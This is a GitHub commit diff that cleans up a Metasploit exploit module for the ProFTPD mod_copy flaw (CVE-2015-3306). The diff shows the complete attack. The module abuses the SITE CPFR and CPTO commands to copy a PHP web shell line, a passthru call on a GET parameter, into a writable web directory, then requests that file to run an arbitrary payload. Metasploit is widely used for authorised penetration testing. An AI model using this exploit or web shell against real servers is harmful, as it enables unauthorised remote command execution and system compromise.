Skip to content

Commit 5ab882a

Browse files
wvuwvu
committed
Clean up module
1 parent 92c91c7 commit 5ab882a

File tree

1 file changed

+24
-23
lines changed

1 file changed

+24
-23
lines changed

modules/exploits/unix/ftp/proftpd_modcopy_exec.rb

Lines changed: 24 additions & 23 deletions
Original file line numberDiff line numberDiff line change
@@ -6,6 +6,7 @@
66
require 'msf/core'
77

88
class Metasploit3 < Msf::Exploit::Remote
9+
910
Rank = ExcellentRanking
1011

1112
include Msf::Exploit::Remote::Tcp
@@ -30,7 +31,7 @@ def initialize(info = {})
3031
'License' => MSF_LICENSE,
3132
'References' =>
3233
[
33-
[ 'CVE', '2015-3306'],
34+
[ 'CVE', '2015-3306' ],
3435
[ 'EDB', '36742' ],
3536
],
3637
'Privileged' => false,
@@ -57,91 +58,91 @@ def initialize(info = {})
5758
OptPort.new('RPORT', [true, 'HTTP port', 80]),
5859
OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
5960
OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']),
61+
OptString.new('TMPPATH', [true, 'Absolute writable/executable path', '/tmp']),
6062
OptString.new('TARGETURI', [true, 'Base path to the website', '/'])
6163
], self.class)
6264
end
6365

6466
def check
6567
ftp_port = datastore['RPORT_FTP']
66-
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => ftp_port })
68+
sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
6769

6870
if sock.nil?
69-
fail_with(Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
71+
fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
7072
else
7173
print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
7274
end
7375

7476
res = sock.get_once(-1,10)
75-
unless ( res and res =~ /220/ )
77+
unless res && res.include?('220')
7678
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
7779
end
7880

7981
sock.puts("SITE CPFR /etc/passwd\r\n")
8082
res = sock.get_once(-1,10)
81-
if res and res =~ /350/
82-
return Exploit::CheckCode::Vulnerable
83+
if res && res.include?('350')
84+
Exploit::CheckCode::Vulnerable
8385
else
84-
return Exploit::CheckCode::Safe
86+
Exploit::CheckCode::Safe
8587
end
8688
end
8789

8890
def exploit
89-
9091
ftp_port = datastore['RPORT_FTP']
9192
get_arg = rand_text_alphanumeric(5+rand(3))
9293
payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'
9394

94-
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => ftp_port })
95+
sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
9596

9697
if sock.nil?
97-
fail_with(Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
98+
fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
9899
else
99100
print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
100101
end
101102

102103
res = sock.get_once(-1,10)
103-
unless ( res and res =~ /220/ )
104+
unless res && res.include?('220')
104105
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
105106
end
106107

107-
print_status("#{rhost}:21 - Sending copy commands to FTP server")
108+
print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")
108109

109110
sock.puts("SITE CPFR /proc/self/cmdline\r\n")
110111
res = sock.get_once(-1,10)
111-
unless ( res and res =~ /350/ )
112+
unless res && res.include?('350')
112113
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
113114
end
114115

115-
sock.put("SITE CPTO /tmp/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
116+
sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
116117
res = sock.get_once(-1,10)
117-
unless ( res and res =~ /250/ )
118+
unless res && res.include?('250')
118119
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
119120
end
120121

121-
sock.put("SITE CPFR /tmp/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
122+
sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
122123
res = sock.get_once(-1,10)
123-
unless ( res and res =~ /350/ )
124+
unless res && res.include?('350')
124125
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
125126
end
126127

127128
sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
128129
res = sock.get_once(-1,10)
129-
unless ( res and res =~ /250/ )
130+
unless res && res.include?('250')
130131
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
131132
end
132133

133134
sock.close
134135

135136
print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}")
136-
res = send_request_cgi!({
137+
res = send_request_cgi!(
137138
'uri' => normalize_uri(target_uri.path, payload_name),
138139
'method' => 'GET',
139140
'vars_get' => { get_arg => "nohup #{payload.encoded} &" },
140-
})
141+
)
141142

142-
unless ( res and res.code == 200 )
143-
fail_with(Failure::Unknown, "#{rhost}:21 - Failure executing payload")
143+
unless res && res.code == 200
144+
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload")
144145
end
145-
146146
end
147+
147148
end

0 commit comments

Comments
 (0)